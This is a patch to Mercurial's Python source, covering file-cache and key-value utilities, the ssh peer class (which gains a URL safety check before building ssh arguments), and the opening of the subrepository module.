904 '''A property like decorator that tracks files under .hg/ for updates.
905
905
906 Records stat info when called in _filecache.
906 Records stat info when called in _filecache.
907
907
908 On subsequent calls, compares old stat info with new info, and recreates the
908 On subsequent calls, compares old stat info with new info, and recreates the
909 object when any of the files changes, updating the new stat info in
909 object when any of the files changes, updating the new stat info in
910 _filecache.
910 _filecache.
911
911
912 Mercurial either atomic renames or appends for files under .hg,
912 Mercurial either atomic renames or appends for files under .hg,
913 so to ensure the cache is reliable we need the filesystem to be able
913 so to ensure the cache is reliable we need the filesystem to be able
914 to tell us if a file has been replaced. If it can't, we fallback to
914 to tell us if a file has been replaced. If it can't, we fallback to
915 recreating the object on every call (essentially the same behavior as
915 recreating the object on every call (essentially the same behavior as
916 propertycache).
916 propertycache).
917
917
918 '''
918 '''
919 def __init__(self, *paths):
919 def __init__(self, *paths):
920 self.paths = paths
920 self.paths = paths
921
921
922 def join(self, obj, fname):
922 def join(self, obj, fname):
923 """Used to compute the runtime path of a cached file.
923 """Used to compute the runtime path of a cached file.
924
924
925 Users should subclass filecache and provide their own version of this
925 Users should subclass filecache and provide their own version of this
926 function to call the appropriate join function on 'obj' (an instance
926 function to call the appropriate join function on 'obj' (an instance
927 of the class that its member function was decorated).
927 of the class that its member function was decorated).
928 """
928 """
929 raise NotImplementedError
929 raise NotImplementedError
930
930
931 def __call__(self, func):
931 def __call__(self, func):
932 self.func = func
932 self.func = func
933 self.name = func.__name__.encode('ascii')
933 self.name = func.__name__.encode('ascii')
934 return self
934 return self
935
935
936 def __get__(self, obj, type=None):
936 def __get__(self, obj, type=None):
937 # if accessed on the class, return the descriptor itself.
937 # if accessed on the class, return the descriptor itself.
938 if obj is None:
938 if obj is None:
939 return self
939 return self
940 # do we need to check if the file changed?
940 # do we need to check if the file changed?
941 if self.name in obj.__dict__:
941 if self.name in obj.__dict__:
942 assert self.name in obj._filecache, self.name
942 assert self.name in obj._filecache, self.name
943 return obj.__dict__[self.name]
943 return obj.__dict__[self.name]
944
944
945 entry = obj._filecache.get(self.name)
945 entry = obj._filecache.get(self.name)
946
946
947 if entry:
947 if entry:
948 if entry.changed():
948 if entry.changed():
949 entry.obj = self.func(obj)
949 entry.obj = self.func(obj)
950 else:
950 else:
951 paths = [self.join(obj, path) for path in self.paths]
951 paths = [self.join(obj, path) for path in self.paths]
952
952
953 # We stat -before- creating the object so our cache doesn't lie if
953 # We stat -before- creating the object so our cache doesn't lie if
954 # a writer modified between the time we read and stat
954 # a writer modified between the time we read and stat
955 entry = filecacheentry(paths, True)
955 entry = filecacheentry(paths, True)
956 entry.obj = self.func(obj)
956 entry.obj = self.func(obj)
957
957
958 obj._filecache[self.name] = entry
958 obj._filecache[self.name] = entry
959
959
960 obj.__dict__[self.name] = entry.obj
960 obj.__dict__[self.name] = entry.obj
961 return entry.obj
961 return entry.obj
962
962
963 def __set__(self, obj, value):
963 def __set__(self, obj, value):
964 if self.name not in obj._filecache:
964 if self.name not in obj._filecache:
965 # we add an entry for the missing value because X in __dict__
965 # we add an entry for the missing value because X in __dict__
966 # implies X in _filecache
966 # implies X in _filecache
967 paths = [self.join(obj, path) for path in self.paths]
967 paths = [self.join(obj, path) for path in self.paths]
968 ce = filecacheentry(paths, False)
968 ce = filecacheentry(paths, False)
969 obj._filecache[self.name] = ce
969 obj._filecache[self.name] = ce
970 else:
970 else:
971 ce = obj._filecache[self.name]
971 ce = obj._filecache[self.name]
972
972
973 ce.obj = value # update cached copy
973 ce.obj = value # update cached copy
974 obj.__dict__[self.name] = value # update copy returned by obj.x
974 obj.__dict__[self.name] = value # update copy returned by obj.x
975
975
976 def __delete__(self, obj):
976 def __delete__(self, obj):
977 try:
977 try:
978 del obj.__dict__[self.name]
978 del obj.__dict__[self.name]
979 except KeyError:
979 except KeyError:
980 raise AttributeError(self.name)
980 raise AttributeError(self.name)
981
981
982 def _locksub(repo, lock, envvar, cmd, environ=None, *args, **kwargs):
982 def _locksub(repo, lock, envvar, cmd, environ=None, *args, **kwargs):
983 if lock is None:
983 if lock is None:
984 raise error.LockInheritanceContractViolation(
984 raise error.LockInheritanceContractViolation(
985 'lock can only be inherited while held')
985 'lock can only be inherited while held')
986 if environ is None:
986 if environ is None:
987 environ = {}
987 environ = {}
988 with lock.inherit() as locker:
988 with lock.inherit() as locker:
989 environ[envvar] = locker
989 environ[envvar] = locker
990 return repo.ui.system(cmd, environ=environ, *args, **kwargs)
990 return repo.ui.system(cmd, environ=environ, *args, **kwargs)
991
991
992 def wlocksub(repo, cmd, *args, **kwargs):
992 def wlocksub(repo, cmd, *args, **kwargs):
993 """run cmd as a subprocess that allows inheriting repo's wlock
993 """run cmd as a subprocess that allows inheriting repo's wlock
994
994
995 This can only be called while the wlock is held. This takes all the
995 This can only be called while the wlock is held. This takes all the
996 arguments that ui.system does, and returns the exit code of the
996 arguments that ui.system does, and returns the exit code of the
997 subprocess."""
997 subprocess."""
998 return _locksub(repo, repo.currentwlock(), 'HG_WLOCK_LOCKER', cmd, *args,
998 return _locksub(repo, repo.currentwlock(), 'HG_WLOCK_LOCKER', cmd, *args,
999 **kwargs)
999 **kwargs)
1000
1000
1001 def gdinitconfig(ui):
1001 def gdinitconfig(ui):
1002 """helper function to know if a repo should be created as general delta
1002 """helper function to know if a repo should be created as general delta
1003 """
1003 """
1004 # experimental config: format.generaldelta
1004 # experimental config: format.generaldelta
1005 return (ui.configbool('format', 'generaldelta')
1005 return (ui.configbool('format', 'generaldelta')
1006 or ui.configbool('format', 'usegeneraldelta'))
1006 or ui.configbool('format', 'usegeneraldelta'))
1007
1007
1008 def gddeltaconfig(ui):
1008 def gddeltaconfig(ui):
1009 """helper function to know if incoming delta should be optimised
1009 """helper function to know if incoming delta should be optimised
1010 """
1010 """
1011 # experimental config: format.generaldelta
1011 # experimental config: format.generaldelta
1012 return ui.configbool('format', 'generaldelta')
1012 return ui.configbool('format', 'generaldelta')
1013
1013
1014 class simplekeyvaluefile(object):
1014 class simplekeyvaluefile(object):
1015 """A simple file with key=value lines
1015 """A simple file with key=value lines
1016
1016
1017 Keys must be alphanumerics and start with a letter, values must not
1017 Keys must be alphanumerics and start with a letter, values must not
1018 contain '\n' characters"""
1018 contain '\n' characters"""
1019 firstlinekey = '__firstline'
1019 firstlinekey = '__firstline'
1020
1020
1021 def __init__(self, vfs, path, keys=None):
1021 def __init__(self, vfs, path, keys=None):
1022 self.vfs = vfs
1022 self.vfs = vfs
1023 self.path = path
1023 self.path = path
1024
1024
1025 def read(self, firstlinenonkeyval=False):
1025 def read(self, firstlinenonkeyval=False):
1026 """Read the contents of a simple key-value file
1026 """Read the contents of a simple key-value file
1027
1027
1028 'firstlinenonkeyval' indicates whether the first line of file should
1028 'firstlinenonkeyval' indicates whether the first line of file should
1029 be treated as a key-value pair or reuturned fully under the
1029 be treated as a key-value pair or reuturned fully under the
1030 __firstline key."""
1030 __firstline key."""
1031 lines = self.vfs.readlines(self.path)
1031 lines = self.vfs.readlines(self.path)
1032 d = {}
1032 d = {}
1033 if firstlinenonkeyval:
1033 if firstlinenonkeyval:
1034 if not lines:
1034 if not lines:
1035 e = _("empty simplekeyvalue file")
1035 e = _("empty simplekeyvalue file")
1036 raise error.CorruptedState(e)
1036 raise error.CorruptedState(e)
1037 # we don't want to include '\n' in the __firstline
1037 # we don't want to include '\n' in the __firstline
1038 d[self.firstlinekey] = lines[0][:-1]
1038 d[self.firstlinekey] = lines[0][:-1]
1039 del lines[0]
1039 del lines[0]
1040
1040
1041 try:
1041 try:
1042 # the 'if line.strip()' part prevents us from failing on empty
1042 # the 'if line.strip()' part prevents us from failing on empty
1043 # lines which only contain '\n' therefore are not skipped
1043 # lines which only contain '\n' therefore are not skipped
1044 # by 'if line'
1044 # by 'if line'
1045 updatedict = dict(line[:-1].split('=', 1) for line in lines
1045 updatedict = dict(line[:-1].split('=', 1) for line in lines
1046 if line.strip())
1046 if line.strip())
1047 if self.firstlinekey in updatedict:
1047 if self.firstlinekey in updatedict:
1048 e = _("%r can't be used as a key")
1048 e = _("%r can't be used as a key")
1049 raise error.CorruptedState(e % self.firstlinekey)
1049 raise error.CorruptedState(e % self.firstlinekey)
1050 d.update(updatedict)
1050 d.update(updatedict)
1051 except ValueError as e:
1051 except ValueError as e:
1052 raise error.CorruptedState(str(e))
1052 raise error.CorruptedState(str(e))
1053 return d
1053 return d
1054
1054
1055 def write(self, data, firstline=None):
1055 def write(self, data, firstline=None):
1056 """Write key=>value mapping to a file
1056 """Write key=>value mapping to a file
1057 data is a dict. Keys must be alphanumerical and start with a letter.
1057 data is a dict. Keys must be alphanumerical and start with a letter.
1058 Values must not contain newline characters.
1058 Values must not contain newline characters.
1059
1059
1060 If 'firstline' is not None, it is written to file before
1060 If 'firstline' is not None, it is written to file before
1061 everything else, as it is, not in a key=value form"""
1061 everything else, as it is, not in a key=value form"""
1062 lines = []
1062 lines = []
1063 if firstline is not None:
1063 if firstline is not None:
1064 lines.append('%s\n' % firstline)
1064 lines.append('%s\n' % firstline)
1065
1065
1066 for k, v in data.items():
1066 for k, v in data.items():
1067 if k == self.firstlinekey:
1067 if k == self.firstlinekey:
1068 e = "key name '%s' is reserved" % self.firstlinekey
1068 e = "key name '%s' is reserved" % self.firstlinekey
1069 raise error.ProgrammingError(e)
1069 raise error.ProgrammingError(e)
1070 if not k[0].isalpha():
1070 if not k[0].isalpha():
1071 e = "keys must start with a letter in a key-value file"
1071 e = "keys must start with a letter in a key-value file"
1072 raise error.ProgrammingError(e)
1072 raise error.ProgrammingError(e)
1073 if not k.isalnum():
1073 if not k.isalnum():
1074 e = "invalid key name in a simple key-value file"
1074 e = "invalid key name in a simple key-value file"
1075 raise error.ProgrammingError(e)
1075 raise error.ProgrammingError(e)
1076 if '\n' in v:
1076 if '\n' in v:
1077 e = "invalid value in a simple key-value file"
1077 e = "invalid value in a simple key-value file"
1078 raise error.ProgrammingError(e)
1078 raise error.ProgrammingError(e)
1079 lines.append("%s=%s\n" % (k, v))
1079 lines.append("%s=%s\n" % (k, v))
1080 with self.vfs(self.path, mode='wb', atomictemp=True) as fp:
1080 with self.vfs(self.path, mode='wb', atomictemp=True) as fp:
1081 fp.write(''.join(lines))
1081 fp.write(''.join(lines))
1082
1082
1083 _reportobsoletedsource = [
1083 _reportobsoletedsource = [
1084 'debugobsolete',
1084 'debugobsolete',
1085 'pull',
1085 'pull',
1086 'push',
1086 'push',
1087 'serve',
1087 'serve',
1088 'unbundle',
1088 'unbundle',
1089 ]
1089 ]
1090
1090
1091 def registersummarycallback(repo, otr, txnname=''):
1091 def registersummarycallback(repo, otr, txnname=''):
1092 """register a callback to issue a summary after the transaction is closed
1092 """register a callback to issue a summary after the transaction is closed
1093 """
1093 """
1094 for source in _reportobsoletedsource:
1094 for source in _reportobsoletedsource:
1095 if txnname.startswith(source):
1095 if txnname.startswith(source):
1096 reporef = weakref.ref(repo)
1096 reporef = weakref.ref(repo)
1097 def reportsummary(tr):
1097 def reportsummary(tr):
1098 """the actual callback reporting the summary"""
1098 """the actual callback reporting the summary"""
1099 repo = reporef()
1099 repo = reporef()
1100 obsoleted = obsutil.getobsoleted(repo, tr)
1100 obsoleted = obsutil.getobsoleted(repo, tr)
1101 if obsoleted:
1101 if obsoleted:
1102 repo.ui.status(_('obsoleted %i changesets\n')
1102 repo.ui.status(_('obsoleted %i changesets\n')
1103 % len(obsoleted))
1103 % len(obsoleted))
1104 otr.addpostclose('00-txnreport', reportsummary)
1104 otr.addpostclose('00-txnreport', reportsummary)
1105 break
1105 break
@@ -1,325 +1,324 b''
1 # sshpeer.py - ssh repository proxy class for mercurial
1 # sshpeer.py - ssh repository proxy class for mercurial
2 #
2 #
3 # Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
3 # Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import re
10 import re
11
11
12 from .i18n import _
12 from .i18n import _
13 from . import (
13 from . import (
14 error,
14 error,
15 pycompat,
15 pycompat,
16 util,
16 util,
17 wireproto,
17 wireproto,
18 )
18 )
19
19
20 def _serverquote(s):
20 def _serverquote(s):
21 if not s:
21 if not s:
22 return s
22 return s
23 '''quote a string for the remote shell ... which we assume is sh'''
23 '''quote a string for the remote shell ... which we assume is sh'''
24 if re.match('[a-zA-Z0-9@%_+=:,./-]*$', s):
24 if re.match('[a-zA-Z0-9@%_+=:,./-]*$', s):
25 return s
25 return s
26 return "'%s'" % s.replace("'", "'\\''")
26 return "'%s'" % s.replace("'", "'\\''")
27
27
28 def _forwardoutput(ui, pipe):
28 def _forwardoutput(ui, pipe):
29 """display all data currently available on pipe as remote output.
29 """display all data currently available on pipe as remote output.
30
30
31 This is non blocking."""
31 This is non blocking."""
32 s = util.readpipe(pipe)
32 s = util.readpipe(pipe)
33 if s:
33 if s:
34 for l in s.splitlines():
34 for l in s.splitlines():
35 ui.status(_("remote: "), l, '\n')
35 ui.status(_("remote: "), l, '\n')
36
36
37 class doublepipe(object):
37 class doublepipe(object):
38 """Operate a side-channel pipe in addition of a main one
38 """Operate a side-channel pipe in addition of a main one
39
39
40 The side-channel pipe contains server output to be forwarded to the user
40 The side-channel pipe contains server output to be forwarded to the user
41 input. The double pipe will behave as the "main" pipe, but will ensure the
41 input. The double pipe will behave as the "main" pipe, but will ensure the
42 content of the "side" pipe is properly processed while we wait for blocking
42 content of the "side" pipe is properly processed while we wait for blocking
43 call on the "main" pipe.
43 call on the "main" pipe.
44
44
45 If large amounts of data are read from "main", the forward will cease after
45 If large amounts of data are read from "main", the forward will cease after
46 the first bytes start to appear. This simplifies the implementation
46 the first bytes start to appear. This simplifies the implementation
47 without affecting actual output of sshpeer too much as we rarely issue
47 without affecting actual output of sshpeer too much as we rarely issue
48 large read for data not yet emitted by the server.
48 large read for data not yet emitted by the server.
49
49
50 The main pipe is expected to be a 'bufferedinputpipe' from the util module
50 The main pipe is expected to be a 'bufferedinputpipe' from the util module
51 that handle all the os specific bits. This class lives in this module
51 that handle all the os specific bits. This class lives in this module
52 because it focus on behavior specific to the ssh protocol."""
52 because it focus on behavior specific to the ssh protocol."""
53
53
54 def __init__(self, ui, main, side):
54 def __init__(self, ui, main, side):
55 self._ui = ui
55 self._ui = ui
56 self._main = main
56 self._main = main
57 self._side = side
57 self._side = side
58
58
59 def _wait(self):
59 def _wait(self):
60 """wait until some data are available on main or side
60 """wait until some data are available on main or side
61
61
62 return a pair of boolean (ismainready, issideready)
62 return a pair of boolean (ismainready, issideready)
63
63
64 (This will only wait for data if the setup is supported by `util.poll`)
64 (This will only wait for data if the setup is supported by `util.poll`)
65 """
65 """
66 if getattr(self._main, 'hasbuffer', False): # getattr for classic pipe
66 if getattr(self._main, 'hasbuffer', False): # getattr for classic pipe
67 return (True, True) # main has data, assume side is worth poking at.
67 return (True, True) # main has data, assume side is worth poking at.
68 fds = [self._main.fileno(), self._side.fileno()]
68 fds = [self._main.fileno(), self._side.fileno()]
69 try:
69 try:
70 act = util.poll(fds)
70 act = util.poll(fds)
71 except NotImplementedError:
71 except NotImplementedError:
72 # non supported yet case, assume all have data.
72 # non supported yet case, assume all have data.
73 act = fds
73 act = fds
74 return (self._main.fileno() in act, self._side.fileno() in act)
74 return (self._main.fileno() in act, self._side.fileno() in act)
75
75
76 def write(self, data):
76 def write(self, data):
77 return self._call('write', data)
77 return self._call('write', data)
78
78
79 def read(self, size):
79 def read(self, size):
80 r = self._call('read', size)
80 r = self._call('read', size)
81 if size != 0 and not r:
81 if size != 0 and not r:
82 # We've observed a condition that indicates the
82 # We've observed a condition that indicates the
83 # stdout closed unexpectedly. Check stderr one
83 # stdout closed unexpectedly. Check stderr one
84 # more time and snag anything that's there before
84 # more time and snag anything that's there before
85 # letting anyone know the main part of the pipe
85 # letting anyone know the main part of the pipe
86 # closed prematurely.
86 # closed prematurely.
87 _forwardoutput(self._ui, self._side)
87 _forwardoutput(self._ui, self._side)
88 return r
88 return r
89
89
90 def readline(self):
90 def readline(self):
91 return self._call('readline')
91 return self._call('readline')
92
92
93 def _call(self, methname, data=None):
93 def _call(self, methname, data=None):
94 """call <methname> on "main", forward output of "side" while blocking
94 """call <methname> on "main", forward output of "side" while blocking
95 """
95 """
96 # data can be '' or 0
96 # data can be '' or 0
97 if (data is not None and not data) or self._main.closed:
97 if (data is not None and not data) or self._main.closed:
98 _forwardoutput(self._ui, self._side)
98 _forwardoutput(self._ui, self._side)
99 return ''
99 return ''
100 while True:
100 while True:
101 mainready, sideready = self._wait()
101 mainready, sideready = self._wait()
102 if sideready:
102 if sideready:
103 _forwardoutput(self._ui, self._side)
103 _forwardoutput(self._ui, self._side)
104 if mainready:
104 if mainready:
105 meth = getattr(self._main, methname)
105 meth = getattr(self._main, methname)
106 if data is None:
106 if data is None:
107 return meth()
107 return meth()
108 else:
108 else:
109 return meth(data)
109 return meth(data)
110
110
111 def close(self):
111 def close(self):
112 return self._main.close()
112 return self._main.close()
113
113
114 def flush(self):
114 def flush(self):
115 return self._main.flush()
115 return self._main.flush()
116
116
117 class sshpeer(wireproto.wirepeer):
117 class sshpeer(wireproto.wirepeer):
118 def __init__(self, ui, path, create=False):
118 def __init__(self, ui, path, create=False):
119 self._url = path
119 self._url = path
120 self.ui = ui
120 self.ui = ui
121 self.pipeo = self.pipei = self.pipee = None
121 self.pipeo = self.pipei = self.pipee = None
122
122
123 u = util.url(path, parsequery=False, parsefragment=False)
123 u = util.url(path, parsequery=False, parsefragment=False)
124 if u.scheme != 'ssh' or not u.host or u.path is None:
124 if u.scheme != 'ssh' or not u.host or u.path is None:
125 self._abort(error.RepoError(_("couldn't parse location %s") % path))
125 self._abort(error.RepoError(_("couldn't parse location %s") % path))
126
126
127 util.checksafessh(path)
128
127 self.user = u.user
129 self.user = u.user
128 if u.passwd is not None:
130 if u.passwd is not None:
129 self._abort(error.RepoError(_("password in URL not supported")))
131 self._abort(error.RepoError(_("password in URL not supported")))
130 self.host = u.host
132 self.host = u.host
131 self.port = u.port
133 self.port = u.port
132 self.path = u.path or "."
134 self.path = u.path or "."
133
135
134 sshcmd = self.ui.config("ui", "ssh")
136 sshcmd = self.ui.config("ui", "ssh")
135 remotecmd = self.ui.config("ui", "remotecmd")
137 remotecmd = self.ui.config("ui", "remotecmd")
136
138
137 args = util.sshargs(sshcmd,
139 args = util.sshargs(sshcmd, self.host, self.user, self.port)
138 _serverquote(self.host),
139 _serverquote(self.user),
140 _serverquote(self.port))
141
140
142 if create:
141 if create:
143 cmd = '%s %s %s' % (sshcmd, args,
142 cmd = '%s %s %s' % (sshcmd, args,
144 util.shellquote("%s init %s" %
143 util.shellquote("%s init %s" %
145 (_serverquote(remotecmd), _serverquote(self.path))))
144 (_serverquote(remotecmd), _serverquote(self.path))))
146 ui.debug('running %s\n' % cmd)
145 ui.debug('running %s\n' % cmd)
147 res = ui.system(cmd, blockedtag='sshpeer')
146 res = ui.system(cmd, blockedtag='sshpeer')
148 if res != 0:
147 if res != 0:
149 self._abort(error.RepoError(_("could not create remote repo")))
148 self._abort(error.RepoError(_("could not create remote repo")))
150
149
151 self._validaterepo(sshcmd, args, remotecmd)
150 self._validaterepo(sshcmd, args, remotecmd)
152
151
153 def url(self):
152 def url(self):
154 return self._url
153 return self._url
155
154
156 def _validaterepo(self, sshcmd, args, remotecmd):
155 def _validaterepo(self, sshcmd, args, remotecmd):
157 # cleanup up previous run
156 # cleanup up previous run
158 self.cleanup()
157 self.cleanup()
159
158
160 cmd = '%s %s %s' % (sshcmd, args,
159 cmd = '%s %s %s' % (sshcmd, args,
161 util.shellquote("%s -R %s serve --stdio" %
160 util.shellquote("%s -R %s serve --stdio" %
162 (_serverquote(remotecmd), _serverquote(self.path))))
161 (_serverquote(remotecmd), _serverquote(self.path))))
163 self.ui.debug('running %s\n' % cmd)
162 self.ui.debug('running %s\n' % cmd)
164 cmd = util.quotecommand(cmd)
163 cmd = util.quotecommand(cmd)
165
164
166 # while self.subprocess isn't used, having it allows the subprocess to
165 # while self.subprocess isn't used, having it allows the subprocess to
167 # to clean up correctly later
166 # to clean up correctly later
168 #
167 #
169 # no buffer allow the use of 'select'
168 # no buffer allow the use of 'select'
170 # feel free to remove buffering and select usage when we ultimately
169 # feel free to remove buffering and select usage when we ultimately
171 # move to threading.
170 # move to threading.
172 sub = util.popen4(cmd, bufsize=0)
171 sub = util.popen4(cmd, bufsize=0)
173 self.pipeo, self.pipei, self.pipee, self.subprocess = sub
172 self.pipeo, self.pipei, self.pipee, self.subprocess = sub
174
173
175 self.pipei = util.bufferedinputpipe(self.pipei)
174 self.pipei = util.bufferedinputpipe(self.pipei)
176 self.pipei = doublepipe(self.ui, self.pipei, self.pipee)
175 self.pipei = doublepipe(self.ui, self.pipei, self.pipee)
177 self.pipeo = doublepipe(self.ui, self.pipeo, self.pipee)
176 self.pipeo = doublepipe(self.ui, self.pipeo, self.pipee)
178
177
179 # skip any noise generated by remote shell
178 # skip any noise generated by remote shell
180 self._callstream("hello")
179 self._callstream("hello")
181 r = self._callstream("between", pairs=("%s-%s" % ("0"*40, "0"*40)))
180 r = self._callstream("between", pairs=("%s-%s" % ("0"*40, "0"*40)))
182 lines = ["", "dummy"]
181 lines = ["", "dummy"]
183 max_noise = 500
182 max_noise = 500
184 while lines[-1] and max_noise:
183 while lines[-1] and max_noise:
185 l = r.readline()
184 l = r.readline()
186 self.readerr()
185 self.readerr()
187 if lines[-1] == "1\n" and l == "\n":
186 if lines[-1] == "1\n" and l == "\n":
188 break
187 break
189 if l:
188 if l:
190 self.ui.debug("remote: ", l)
189 self.ui.debug("remote: ", l)
191 lines.append(l)
190 lines.append(l)
192 max_noise -= 1
191 max_noise -= 1
193 else:
192 else:
194 self._abort(error.RepoError(_('no suitable response from '
193 self._abort(error.RepoError(_('no suitable response from '
195 'remote hg')))
194 'remote hg')))
196
195
197 self._caps = set()
196 self._caps = set()
198 for l in reversed(lines):
197 for l in reversed(lines):
199 if l.startswith("capabilities:"):
198 if l.startswith("capabilities:"):
200 self._caps.update(l[:-1].split(":")[1].split())
199 self._caps.update(l[:-1].split(":")[1].split())
201 break
200 break
202
201
203 def _capabilities(self):
202 def _capabilities(self):
204 return self._caps
203 return self._caps
205
204
206 def readerr(self):
205 def readerr(self):
207 _forwardoutput(self.ui, self.pipee)
206 _forwardoutput(self.ui, self.pipee)
208
207
209 def _abort(self, exception):
208 def _abort(self, exception):
210 self.cleanup()
209 self.cleanup()
211 raise exception
210 raise exception
212
211
213 def cleanup(self):
212 def cleanup(self):
214 if self.pipeo is None:
213 if self.pipeo is None:
215 return
214 return
216 self.pipeo.close()
215 self.pipeo.close()
217 self.pipei.close()
216 self.pipei.close()
218 try:
217 try:
219 # read the error descriptor until EOF
218 # read the error descriptor until EOF
220 for l in self.pipee:
219 for l in self.pipee:
221 self.ui.status(_("remote: "), l)
220 self.ui.status(_("remote: "), l)
222 except (IOError, ValueError):
221 except (IOError, ValueError):
223 pass
222 pass
224 self.pipee.close()
223 self.pipee.close()
225
224
226 __del__ = cleanup
225 __del__ = cleanup
227
226
228 def _submitbatch(self, req):
227 def _submitbatch(self, req):
229 rsp = self._callstream("batch", cmds=wireproto.encodebatchcmds(req))
228 rsp = self._callstream("batch", cmds=wireproto.encodebatchcmds(req))
230 available = self._getamount()
229 available = self._getamount()
231 # TODO this response parsing is probably suboptimal for large
230 # TODO this response parsing is probably suboptimal for large
232 # batches with large responses.
231 # batches with large responses.
233 toread = min(available, 1024)
232 toread = min(available, 1024)
234 work = rsp.read(toread)
233 work = rsp.read(toread)
235 available -= toread
234 available -= toread
236 chunk = work
235 chunk = work
237 while chunk:
236 while chunk:
238 while ';' in work:
237 while ';' in work:
239 one, work = work.split(';', 1)
238 one, work = work.split(';', 1)
240 yield wireproto.unescapearg(one)
239 yield wireproto.unescapearg(one)
241 toread = min(available, 1024)
240 toread = min(available, 1024)
242 chunk = rsp.read(toread)
241 chunk = rsp.read(toread)
243 available -= toread
242 available -= toread
244 work += chunk
243 work += chunk
245 yield wireproto.unescapearg(work)
244 yield wireproto.unescapearg(work)
246
245
247 def _callstream(self, cmd, **args):
246 def _callstream(self, cmd, **args):
248 args = pycompat.byteskwargs(args)
247 args = pycompat.byteskwargs(args)
249 self.ui.debug("sending %s command\n" % cmd)
248 self.ui.debug("sending %s command\n" % cmd)
250 self.pipeo.write("%s\n" % cmd)
249 self.pipeo.write("%s\n" % cmd)
251 _func, names = wireproto.commands[cmd]
250 _func, names = wireproto.commands[cmd]
252 keys = names.split()
251 keys = names.split()
253 wireargs = {}
252 wireargs = {}
254 for k in keys:
253 for k in keys:
255 if k == '*':
254 if k == '*':
256 wireargs['*'] = args
255 wireargs['*'] = args
257 break
256 break
258 else:
257 else:
259 wireargs[k] = args[k]
258 wireargs[k] = args[k]
260 del args[k]
259 del args[k]
261 for k, v in sorted(wireargs.iteritems()):
260 for k, v in sorted(wireargs.iteritems()):
262 self.pipeo.write("%s %d\n" % (k, len(v)))
261 self.pipeo.write("%s %d\n" % (k, len(v)))
263 if isinstance(v, dict):
262 if isinstance(v, dict):
264 for dk, dv in v.iteritems():
263 for dk, dv in v.iteritems():
265 self.pipeo.write("%s %d\n" % (dk, len(dv)))
264 self.pipeo.write("%s %d\n" % (dk, len(dv)))
266 self.pipeo.write(dv)
265 self.pipeo.write(dv)
267 else:
266 else:
268 self.pipeo.write(v)
267 self.pipeo.write(v)
269 self.pipeo.flush()
268 self.pipeo.flush()
270
269
271 return self.pipei
270 return self.pipei
272
271
273 def _callcompressable(self, cmd, **args):
272 def _callcompressable(self, cmd, **args):
274 return self._callstream(cmd, **args)
273 return self._callstream(cmd, **args)
275
274
276 def _call(self, cmd, **args):
275 def _call(self, cmd, **args):
277 self._callstream(cmd, **args)
276 self._callstream(cmd, **args)
278 return self._recv()
277 return self._recv()
279
278
280 def _callpush(self, cmd, fp, **args):
279 def _callpush(self, cmd, fp, **args):
281 r = self._call(cmd, **args)
280 r = self._call(cmd, **args)
282 if r:
281 if r:
283 return '', r
282 return '', r
284 for d in iter(lambda: fp.read(4096), ''):
283 for d in iter(lambda: fp.read(4096), ''):
285 self._send(d)
284 self._send(d)
286 self._send("", flush=True)
285 self._send("", flush=True)
287 r = self._recv()
286 r = self._recv()
288 if r:
287 if r:
289 return '', r
288 return '', r
290 return self._recv(), ''
289 return self._recv(), ''
291
290
292 def _calltwowaystream(self, cmd, fp, **args):
291 def _calltwowaystream(self, cmd, fp, **args):
293 r = self._call(cmd, **args)
292 r = self._call(cmd, **args)
294 if r:
293 if r:
295 # XXX needs to be made better
294 # XXX needs to be made better
296 raise error.Abort(_('unexpected remote reply: %s') % r)
295 raise error.Abort(_('unexpected remote reply: %s') % r)
297 for d in iter(lambda: fp.read(4096), ''):
296 for d in iter(lambda: fp.read(4096), ''):
298 self._send(d)
297 self._send(d)
299 self._send("", flush=True)
298 self._send("", flush=True)
300 return self.pipei
299 return self.pipei
301
300
302 def _getamount(self):
301 def _getamount(self):
303 l = self.pipei.readline()
302 l = self.pipei.readline()
304 if l == '\n':
303 if l == '\n':
305 self.readerr()
304 self.readerr()
306 msg = _('check previous remote output')
305 msg = _('check previous remote output')
307 self._abort(error.OutOfBandError(hint=msg))
306 self._abort(error.OutOfBandError(hint=msg))
308 self.readerr()
307 self.readerr()
309 try:
308 try:
310 return int(l)
309 return int(l)
311 except ValueError:
310 except ValueError:
312 self._abort(error.ResponseError(_("unexpected response:"), l))
311 self._abort(error.ResponseError(_("unexpected response:"), l))
313
312
314 def _recv(self):
313 def _recv(self):
315 return self.pipei.read(self._getamount())
314 return self.pipei.read(self._getamount())
316
315
317 def _send(self, data, flush=False):
316 def _send(self, data, flush=False):
318 self.pipeo.write("%d\n" % len(data))
317 self.pipeo.write("%d\n" % len(data))
319 if data:
318 if data:
320 self.pipeo.write(data)
319 self.pipeo.write(data)
321 if flush:
320 if flush:
322 self.pipeo.flush()
321 self.pipeo.flush()
323 self.readerr()
322 self.readerr()
324
323
325 instance = sshpeer
324 instance = sshpeer
@@ -1,1995 +1,2002 b''
1 # subrepo.py - sub-repository handling for Mercurial
1 # subrepo.py - sub-repository handling for Mercurial
2 #
2 #
3 # Copyright 2009-2010 Matt Mackall <mpm@selenic.com>
3 # Copyright 2009-2010 Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import copy
10 import copy
11 import errno
11 import errno
12 import hashlib
12 import hashlib
13 import os
13 import os
14 import posixpath
14 import posixpath
15 import re
15 import re
16 import stat
16 import stat
17 import subprocess
17 import subprocess
18 import sys
18 import sys
19 import tarfile
19 import tarfile
20 import xml.dom.minidom
20 import xml.dom.minidom
21
21
22
22
23 from .i18n import _
23 from .i18n import _
24 from . import (
24 from . import (
25 cmdutil,
25 cmdutil,
26 config,
26 config,
27 encoding,
27 encoding,
28 error,
28 error,
29 exchange,
29 exchange,
30 filemerge,
30 filemerge,
31 match as matchmod,
31 match as matchmod,
32 node,
32 node,
33 pathutil,
33 pathutil,
34 phases,
34 phases,
35 pycompat,
35 pycompat,
36 scmutil,
36 scmutil,
37 util,
37 util,
38 vfs as vfsmod,
38 vfs as vfsmod,
39 )
39 )
40
40
41 hg = None
41 hg = None
42 propertycache = util.propertycache
42 propertycache = util.propertycache
43
43
44 nullstate = ('', '', 'empty')
44 nullstate = ('', '', 'empty')
45
45
